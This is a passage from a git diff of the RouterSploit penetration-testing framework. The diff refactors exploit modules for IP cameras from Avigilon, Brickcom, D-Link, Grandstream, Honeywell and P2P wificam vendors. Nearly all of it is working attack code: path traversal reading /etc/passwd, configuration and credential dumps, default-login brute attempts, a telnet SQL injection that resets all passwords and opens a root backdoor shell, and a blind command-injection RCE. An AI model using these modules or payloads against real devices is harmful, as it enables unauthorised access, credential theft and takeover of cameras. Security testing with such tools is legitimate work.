running.clear() - - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - tn.close() - break - except EOFError: - print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) - retries += 1 - - if retries > 2: - print_error("Too much connection problems. Quiting...", verbose=module_verbosity) - return - continue - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/exploits/cameras/avigilon/__init__.py b/routersploit/modules/exploits/cameras/avigilon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/exploits/cameras/avigilon/videoiq_camera_path_traversal.py b/routersploit/modules/exploits/cameras/avigilon/videoiq_camera_path_traversal.py new file mode 100644 index 000000000..e0b11506b --- /dev/null +++ b/routersploit/modules/exploits/cameras/avigilon/videoiq_camera_path_traversal.py @@ -0,0 +1,66 @@ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Avigilon VideoIQ Camera Path Traversal", + "description": "Module exploits Avigilon VideoIQ Camera Path Traversal vulnerability. If target is vulnerable " + "it is possible to read file from file system.", + "authors": [ + "Yakir Wizman", # vulnerability discovery + "Marcin Bury ", # routersploit module + ], + "references": [ + "https://www.exploit-db.com/exploits/40284/", + ], + "devices": [ + "VideoIQ Camera", + ], + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") + + filename = OptString("/etc/passwd", "File to read from filesystem") + + def run(self): + if self.check(): + print_success("Target seems to be vulnerable") + + path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}".format(self.filename) + + response = self.http_request( + method="GET", + path=path + ) + + if response is None: + print_error("Exploit failed - could not read response") + return + + print_status("Trying to read file: {}".format(self.filename)) + if any(err in response.text for err in ["Error 404 NOT_FOUND", "Problem accessing", "HTTP ERROR 404"]): + print_status("File does not exist: {}".format(self.filename)) + return + + if response.text: + print_info(response.text) + else: + print_status("File seems to be empty") + else: + print_error("Exploit failed - target seems to be not vulnerable") + + @mute + def check(self): + path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" + + response = self.http_request( + method="GET", + path=path + ) + + if response and utils.detect_file_content(response.text, "/etc/passwd"): + return True # target is vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/cameras/brickcom/corp_network_cameras_conf_disclosure.py b/routersploit/modules/exploits/cameras/brickcom/corp_network_cameras_conf_disclosure.py index 006807f00..74b36aa8b 100644 --- a/routersploit/modules/exploits/cameras/brickcom/corp_network_cameras_conf_disclosure.py +++ b/routersploit/modules/exploits/cameras/brickcom/corp_network_cameras_conf_disclosure.py @@ -1,80 +1,81 @@ -from routersploit import ( - exploits, - print_error, - print_info, - print_success, - print_status, - http_request, - mute, - validators -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Brickcom Corporation Network Camera Configuration Disclosure vulnerability. - If target is vulnerable it is possible to read device configuration including administrative credentials. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Brickcom Corp Network Camera Conf Disclosure', - 'description': 'Module exploits Brickcom Corporation Network Camera Configuration Dislosure vulnerability. If target is vulnerable ' - 'it is possible to read device configuration including administrative credentials.', - 'authors': [ - 'Orwelllabs', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/39696/', - ], - 'devices': [ - 'Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12 (release:09/08/2010 14:46)', - 'Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26 (release:01/21/2011 18:31)', - 'Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise (release:2015-10-01_18:46:07)', - 'Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T (release:2016-03-21_10:08:24)', - 'Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T (release:2015-06-25_11:18:07)', - 'Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R (release:2015-09-08_18:40:11)', - 'Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-16_11:36:46)', - 'Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-15_11:30:46)', - 'Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR (release:2016-01-18_10:07:03)', - 'Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version: v3.7.0.17A (release: 2015-07-10_11:36:41)', - 'Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version: v3.7.0.18.3R (release: 2015-10-15_11:30:46)', - 'Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8 (release:2013-08-01)', - 'Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release: 09/07/2010 11:45)', - 'Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R (release: 2015-08-19_18:47:31)', - ], + "name": "Brickcom Corp Network Camera Conf Disclosure", + "description": "Module exploits Brickcom Corporation Network Camera Configuration Dislosure vulnerability. If target is vulnerable " + "it is possible to read device configuration including administrative credentials.", + "authors": ( + "Orwelllabs", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/39696/", + ), + "devices": ( + "Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12 (release:09/08/2010 14:46)", + "Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26 (release:01/21/2011 18:31)", + "Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise (release:2015-10-01_18:46:07)", + "Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T (release:2016-03-21_10:08:24)", + "Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T (release:2015-06-25_11:18:07)", + "Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R (release:2015-09-08_18:40:11)", + "Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-16_11:36:46)", + "Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-15_11:30:46)", + "Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR (release:2016-01-18_10:07:03)", + "Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version: v3.7.0.17A (release: 2015-07-10_11:36:41)", + "Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version: v3.7.0.18.3R (release: 2015-10-15_11:30:46)", + "Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8 (release:2013-08-01)", + "Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release: 09/07/2010 11:45)", + "Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R (release: 2015-08-19_18:47:31)", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port', validators=validators.integer) # default port - - resources = [ - '/configfile.dump?action=get', - '/configfile.dump.backup', - '/configfile.dump.gz', - '/configfile.dump', - ] + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def __init__(self): + self.paths = ( + "/configfile.dump?action=get", + "/configfile.dump.backup", + "/configfile.dump.gz", + "/configfile.dump", + ) + self.content = None + self.valid_path = None def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Dumping configuration...") - print_info(self.content) + print_status("URL: {}".format(self.get_target_url(path=self.valid_path))) + + dump_size = 10000 + if len(self.content) > dump_size: + print_status("Content too big to display - showing first {} characters.".format(dump_size)) + print_info(self.content[:dump_size]) # max 10000 characters + print_info("(..)") + else: + print_info(self.content) else: print_error("Exploit failed - target seems to be not vulnerable") @mute def check(self): - for resource in self.resources: - url = "{}:{}{}".format(self.target, self.port, resource) - response = http_request(method="GET", url=url) + for path in self.paths: + response = self.http_request( + method="GET", + path=path, + ) + if response is None: break if any([setting in response.text for setting in ["DeviceBasicInfo", "UserSetSetting", "DDNSSetting"]]): self.content = response.text + self.valid_path = path return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/cameras/brickcom/users_cgi_cred_disclosure.py b/routersploit/modules/exploits/cameras/brickcom/users_cgi_cred_disclosure.py deleted file mode 100644 index ebaa41ed3..000000000 --- a/routersploit/modules/exploits/cameras/brickcom/users_cgi_cred_disclosure.py +++ /dev/null @@ -1,75 +0,0 @@ -from routersploit import ( - exploits, - print_error, - print_info, - print_success, - print_status, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for miscellaneous Brickcom cameras with "users.cgi". - Allows remote credential disclosure by low-privilege user. - """ - __info__ = { - 'name': 'Brickcom Remote Credentials Disclosure', - 'description': 'Exploit implementation for miscellaneous Brickcom cameras with "users.cgi".' - 'Allows remote credential disclosure by low-privilege user.', - 'authors': [ - 'Emiliano Ipar <@maninoipar>', # vulnerability discovery - 'Ignacio Agustin Lizaso <@ignacio_lizaso>', # vulnerability discovery - 'Gaston Emanuel Rivadero <@derlok_epsilon>', # vulnerability discovery - 'Josh Abraham', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/42588/', - 'https://www.brickcom.com/news/productCERT_security_advisorie.php', - ], - 'devices': [ - 'Brickcom WCB-040Af', - 'Brickcom WCB-100A', - 'Brickcom WCB-100Ae', - 'Brickcom OB-302Np', - 'Brickcom OB-300Af', - 'Brickcom OB-500Af', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port', validators=validators.integer) # default port - - credentials = [ - ('admin', 'admin'), - ('viewer', 'viewer'), - ('rviewer', 'rviewer'), - ] - - def __init__(self): - self.configuration = None - self.resource = '/cgi-bin/users.cgi?action=getUsers' - - def run(self): - if self.check(): - print_success("Target appears to be vulnerable") - print_status("Dumping configuration...") - print_info(self.configuration) - else: - print_error("Exploit failed - target does not appear vulnerable") - - @mute - def check(self): - url = "{}:{}{}".format(self.target, self.port, self.resource) - for credential in self.credentials: - response = http_request(method="GET", url=url, auth=credential) - if response is None: - break - - if any([setting in response.text for setting in ["username", "password", "privilege"]]): - self.configuration = response.text - return True # target is vulnerable - - return False # target is not vulnerable diff --git a/routersploit/modules/exploits/cameras/brickcom/users_cgi_creds_disclosure.py b/routersploit/modules/exploits/cameras/brickcom/users_cgi_creds_disclosure.py new file mode 100644 index 000000000..6bba9afe8 --- /dev/null +++ b/routersploit/modules/exploits/cameras/brickcom/users_cgi_creds_disclosure.py @@ -0,0 +1,67 @@ +import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Brickcom Camera Credentials Disclosure", + "description": "Exploit implementation for miscellaneous Brickcom cameras with 'users.cgi'." + "Allows remote credential disclosure by low-privilege user.", + "authors": ( + "Emiliano Ipar <@maninoipar>", # vulnerability discovery + "Ignacio Agustin Lizaso <@ignacio_lizaso>", # vulnerability discovery + "Gaston Emanuel Rivadero <@derlok_epsilon>", # vulnerability discovery + "Josh Abraham", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/42588/", + "https://www.brickcom.com/news/productCERT_security_advisorie.php", + ), + "devices": ( + "Brickcom WCB-040Af", + "Brickcom WCB-100A", + "Brickcom WCB-100Ae", + "Brickcom OB-302Np", + "Brickcom OB-300Af", + "Brickcom OB-500Af", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + def __init__(self): + self.credentials = ( + ("admin", "admin"), + ("viewer", "viewer"), + ("rviewer", "rviewer"), + ) + + self.configuration = None + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable") + print_status("Dumping configuration...") + print_info(self.configuration) + else: + print_error("Exploit failed - target does not appear vulnerable") + + @mute + def check(self): + for username, password in self.credentials: + response = self.http_request( + method="GET", + path="/cgi-bin/users.cgi?action=getUsers", + auth=(username, password) + ) + + if response is None: + break + + if any([re.findall(regexp, response.text) for regexp in [r"User1.username=.*", r"User1.password=.*", r"User1.privilege=.*"]]): + self.configuration = response.text + return True # target is vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py b/routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py index b5d337322..9d658c792 100644 --- a/routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py +++ b/routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py @@ -1,41 +1,76 @@ import re -from routersploit import ( - exploits, - print_error, - print_table, - print_success, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - D-Link DCS web cameras allow unauthenticated attackers to obtain the - configuration of the device remotely. A copy of the device configuration can be - obtained by accessing unprocteted URL. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DCS Cameras Authentication Bypass', - 'description': 'D-Link DCS web cameras allow unauthenticated attackers to obtain the configuration of the device remotely.' - ' A copy of the device configuration can be obtained by accessing unprocteted URL.', - 'authors': [ - 'Roberto Paleari', # vulnerability discovery - 'Dino Causevic', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/24442/', - ], - 'devices': [ - 'D-Link DCS-930L, firmware version 1.04', - 'D-Link DCS-932L, firmware version 1.02' - ], + "name": "D-Link DCS Cameras Authentication Bypass", + "description": "D-Link DCS web cameras allow unauthenticated attackers to obtain the " + "configuration of the device remotely. A copy of the device configuration " + "can be obtained by accessing unprocteted URL. ", + "authors": ( + "Roberto Paleari", # vulnerability discovery + "Dino Causevic", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/24442/", + ), + "devices": ( + "D-Link DCS-930L, firmware version 1.04", + "D-Link DCS-932L, firmware version 1.02" + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port') # default port - config_content = None + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") + + def __init__(self): + config_content = None + + def run(self): + + if self.check(): + print_success("Target appears to be vulnerable.") + + admin_id = None + admin_password = None + + if self.config_content and len(self.config_content): + + for line in self.config_content.split("\n"): + line = line.strip() + + m_groups = re.match(r"AdminID=(.*)", line, re.I | re.M) + if m_groups: + print_success("Found Admin ID.") + admin_id = m_groups.group(1) + + m_groups = re.match(r'AdminPassword=(.*)', line, re.I | re.M) + if m_groups: + print_success("Found Admin password.") + admin_password = m_groups.group(1) + break + + print_table(("AdminId", "Password"), (admin_id, admin_password)) + + else: + print_error("Exploit failed - target seems to be not vulnerable") + + @mute + def check(self): + response = self.http_request( + method="GET", + path="/frame/GetConfig" + ) + + if response and response.status_code == 200 and len(response.content): + self.config_content = self._deobfuscate(response.content) + + if self.config_content and any([x in self.config_content for x in ["AdminID=", "AdminPassword="]]): + return True # target is vulnerable + + return False # target is not vulnerable def _deobfuscate(self, config): @@ -48,7 +83,6 @@ def chain(lambdas, value): return r_chain arr_c = [chain([ - lambda d: ord(d), lambda d: (d + ord('y')) & 0xff, lambda d: (d ^ ord('Z')) & 0xff, lambda d: (d - ord('e')) & 0xff @@ -57,7 +91,7 @@ def chain(lambdas, value): arr_c_len = len(arr_c) tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff - for t in reversed(xrange(arr_c_len)): + for t in reversed(range(arr_c_len)): if t == 0: ct = chain([ @@ -76,47 +110,9 @@ def chain(lambdas, value): print_error("Config file can't be deobfuscated.") return None - for i in xrange(len(tmp_str) / 2): - ret_str += tmp_str[i + (len(tmp_str) / 2)] + tmp_str[i] + half_str_len = int(len(tmp_str) / 2) + for i in range(half_str_len): + ret_str += tmp_str[i + half_str_len] + tmp_str[i] return ret_str - def run(self): - - if self.check(): - print_success("Target appears to be vulnerable.") - - admin_id = None - admin_password = None - - if self.config_content and len(self.config_content): - - for line in self.config_content.split("\n"): - line = line.strip() - - m_groups = re.match(r'AdminID=(.*)', line, re.I | re.M) - if m_groups: - print_success("Found Admin ID.") - admin_id = m_groups.group(1) - - m_groups = re.match(r'AdminPassword=(.*)', line, re.I | re.M) - if m_groups: - print_success("Found Admin password.") - admin_password = m_groups.group(1) - break - - print_table(("AdminId", "Password"), (admin_id, admin_password)) - - else: - print_error("Exploit failed - target seems to be not vulnerable") - - @mute - def check(self): - url = "{}:{}/frame/GetConfig".format(self.target, self.port) - response = http_request(method="GET", url=url) - - if response is not None and len(response.content) and response.status_code == 200: - self.config_content = self._deobfuscate(response.content) - return True if self.config_content else False # target is vulnerable - - return False # target is not vulnerable diff --git a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py new file mode 100644 index 000000000..06773e796 --- /dev/null +++ b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py @@ -0,0 +1,61 @@ +from routersploit.core.exploit import * +from routersploit.core.telnet.telnet_client import TelnetClient + + +class Exploit(TelnetClient): + __info__ = { + "name": "Grandsteam GXV3611 HD - Backdoor", + "description": "Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. " + "After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it.", + "authors": ( + "pizza1337", # exploit author + "Joshua Abraham", # routesploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/40441/", + "http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html", + ), + "devices": ( + "Grandstream GXV3611 HD", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(23, "Target Telnet port") + + username = OptString("admin") + password = OptString("") + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable...") + + tn = self.telnet_login(self.username, self.password) + + print_status("Triggering backdoor to start telnet server") + self.telnet_read_until(tn, "> ") + self.telnet_write(tn, "!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. + self.telnet_read_until(tn, "> ") + self.telnet_write(tn, "quit\r\n") + self.telnet_close() + + print_success("SQLI successful, going to telnet into port 20000 " + "with username root and no password to get shell") + + + tn = self.telnet_login("root", "", port=20000) + if tn: + self.telnet_interactive(tn) + + else: + print_error("Exploit failed. Target does not appear vulnerable") + + @mute + def check(self): + tn = self.telnet_connect() + + res = self.telnet_read_until(tn, "login:") + if res and "Grandstream" in res: + return True + + return False diff --git a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py deleted file mode 100644 index 97f14dc52..000000000 --- a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py +++ /dev/null @@ -1,77 +0,0 @@ -import telnetlib - -from routersploit import ( - exploits, - mute, - print_error, - print_success, - validators, -) - - -class Exploit(exploits.Exploit): - __info__ = { - 'name': 'Grandsteam GXV3611_HD - SQL Injection', - 'description': 'Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. ' - 'After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it', - 'authors': [ - 'pizza1337', # exploit author - 'Joshua Abraham', # routesploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/40441/', - 'http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html', - ], - 'devices': [ - 'Grandstream GXV3611_HD', - ], - } - - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.ipv4) # target address - telnet_port = exploits.Option(23, 'Target port', validators=validators.integer) # default port - - def run(self): - if self.check(): - print_success("Target appears to be vulnerable...") - - try: - conn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) - conn.read_until("Username: ") - conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a' - conn.read_until("Password: ") - conn.write("nothing\r\n") - conn.read_until("Username: ") - conn.write("admin\r\n") - conn.read_until("Password: ") - conn.write("a\r\n") # Login with the new password - conn.read_until("> ") - conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. - conn.read_until("> ") - conn.write("quit\r\n") - conn.close() - print_success("SQLI successful, going to telnet into port 20000 " - "with username root and no password to get shell") - except Exception: - print_error("Exploit failed. Could not log in.") - - try: - conn = telnetlib.Telnet(self.target, 20000, timeout=10) - conn.read_until("login: ") - conn.write("root\r\n") - conn.read_until("Password: ") - conn.write("\r\n") - conn.read_until("# ") - print_success("Authenticaiton Successful") - conn.interact() - except Exception: - print_error("Failed to log into backdoor.") - else: - print_error("Exploit failed. Target does not appear vulnerable") - - @mute - def check(self): - try: - conn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) - return 'Grandstream' in conn.read_until("login:") - except Exception: - return False diff --git a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli.py b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli.py new file mode 100644 index 000000000..556281ed4 --- /dev/null +++ b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli.py @@ -0,0 +1,60 @@ +from routersploit.core.exploit import * +from routersploit.core.telnet.telnet_client import TelnetClient + + +class Exploit(TelnetClient): + __info__ = { + "name": "Grandsteam GXV3611 HD - SQL Injection", + "description": "Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. " + "After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it.", + "authors": ( + "pizza1337", # exploit author + "Joshua Abraham", # routesploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/40441/", + "http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html", + ), + "devices": ( + "Grandstream GXV3611 HD", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(23, "Target Telnet port") + + def run(self): + if self.check(): + print_success("Target appears to be vulnerable...") + + tn = self.telnet_connect() + + self.telnet_read_until(tn, "Username: ") + self.telnet_write(tn, "';update user set password='a';--\r\n") # This changes all the passwords to 'a' + self.telnet_read_until(tn, "Password: ") + self.telnet_write(tn, "nothing\r\n") + self.telnet_read_until(tn, "Username: ") + self.telnet_write(tn, "admin\r\n") + self.telnet_read_until(tn, "Password: ") + self.telnet_write(tn, "a\r\n") # Login with the new password + self.telnet_read_until(tn, "> ") + self.telnet_write(tn, "!#/ port lol\r\n") # Backdoor command triggers telnet server to startup. + self.telnet_read_until(tn, "> ") + self.telnet_write(tn, "quit\r\n") + self.telnet_close() + + print_success("SQLI successful, going to telnet into port 20000 " + "with username root and no password to get shell") + + else: + print_error("Exploit failed. Target does not appear vulnerable") + + @mute + def check(self): + tn = self.telnet_connect() + + res = self.telnet_read_until(tn, "login:") + if res and "Grandstream" in res: + return True + + return False diff --git a/routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py b/routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py index 1bbebc460..58f7b91f1 100644 --- a/routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py +++ b/routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py @@ -1,37 +1,26 @@ -from routersploit import ( - exploits, - print_error, - print_info, - print_success, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Honeywell IP-Camera HICC-1100PT Password Dislosure vulnerability. - If target is vulnerable it is possible to read administative credentials. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Honeywell IP-Camera HICC-1100PT Password Disclosure', - 'description': 'Module exploits Honeywell IP-Camera HICC-1100PT Password Dislosure vulnerability. If target is vulnerable ' - 'it is possible to read administrative credentials', - 'authors': [ - 'Yakir Wizman', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/40261/', - ], - 'devices': [ - 'Honeywell IP-Camera HICC-1100PT', - ], + "name": "Honeywell IP-Camera HICC-1100PT Password Disclosure", + "description": "Module exploits Honeywell IP-Camera HICC-1100PT Password Dislosure vulnerability. " + "If target is vulnerable it is possible to read administrative credentials.", + "authors": ( + "Yakir Wizman", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/40261/", + ), + "devices": ( + "Honeywell IP-Camera HICC-1100PT", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def __init__(self): self.content = None @@ -45,10 +34,12 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/readfile.cgi?query=ADMINID".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/cgi-bin/readfile.cgi?query=ADMINID", + ) - if response is not None and "Adm_ID" in response.text: + if response and "Adm_ID" in response.text: self.content = response.text return True # target is vulnerable diff --git a/routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py b/routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py index 6abf79f56..a84f02f85 100644 --- a/routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py +++ b/routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py @@ -1,32 +1,20 @@ import requests +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - sanitize_url, - http_request, - print_error, - print_success, - print_info, - validators -) - -class Exploit(exploits.Exploit): - """ - Simple description - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'P2P wificam credential disclosure', - 'description': """A credential disclosure in several cameras which - utilize the GoAhead webserver.""", - 'authors': [ - 'casept ', # routesploit module - 'Pierre Kim ' # CVE-2017-8225 and others - ], - 'references': [ - 'https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html', - ], - 'devices': [ + "name": "P2P wificam credential disclosure", + "description": "A credential disclosure in several cameras which utilize the GoAhead webserver.", + "authors": ( + "Pierre Kim ", # CVE-2017-8225 and others + "casept ", # routesploit module + ), + "references": ( + "https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html", + ), + 'devices': ( '3G+IPCam Other', '3SVISION Other', '3com CASA', @@ -1280,17 +1268,19 @@ class Exploit(exploits.Exploit): 'semac Other', 'skylink WC-300PS', 'storex D-10H', - ], + ), } - target = exploits.Option( - '', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): - url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port)) - response = requests.get(url) + response = self.http_request( + method="GET", + path="/system.ini?loginuse&loginpas" + ) + print_info("Exploit succeeded, extracting credentials...") # May the lord forgive me for writing such spaghetti @@ -1330,16 +1320,19 @@ def run(self): index = index + 1 password = password_bytes.decode('utf-8') print_success("Password: " + password) - # PHEW! else: print_error("Exploit failed. Device seems to be not vulnerable.") + @mute def check(self): - url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port)) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/system.ini?loginuse&loginpas" + ) + if response is None: return False if response.status_code == 200 and b'\x00\x00\x0a\x0a\x0a\x0a\x01' in response.content: return True - else: - return False + + return False diff --git a/routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py b/routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py index 9ccc9a347..bfb8b166a 100644 --- a/routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py +++ b/routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py @@ -1,36 +1,22 @@ import time +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - sanitize_url, - http_request, - print_error, - print_success, - print_status, - print_info, - shell, - validators, - mute -) - -class Exploit(exploits.Exploit): - """ - Simple description - """ +class Exploit(HTTPClient): __info__ = { 'name': 'P2P wificam remote code execution', 'description': """A credential disclosure in several cameras which utilize the GoAhead webserver, combined with an authenticated RCE allows for unauthenticated remote code execution.""", - 'authors': [ - 'casept ', # routesploit module + 'authors': ( 'Pierre Kim ' # CVE-2017-8225 and others - ], - 'references': [ + 'casept ', # routesploit module + ), + 'references': ( 'https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html', - ], - 'devices': [ + ), + 'devices': ( '3G+IPCam Other', '3SVISION Other', '3com CASA', @@ -1284,18 +1270,17 @@ class Exploit(exploits.Exploit): 'semac Other', 'skylink WC-300PS', 'storex D-10H', - ], + ), } - target = exploits.Option( - '', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - print_status("It is blind command injection - response is not available") + print_status("It is blind command injection - response is not available. Use reverse_tcp ") shell(self, architecture="mipsbe", method="wget", location="/tmp") else: print_error("Exploit failed. Device seems to be not vulnerable.") @@ -1303,18 +1288,25 @@ def run(self): def execute(self, cmd): # Get credentials print_status("Extracting credentials") - credential_url = 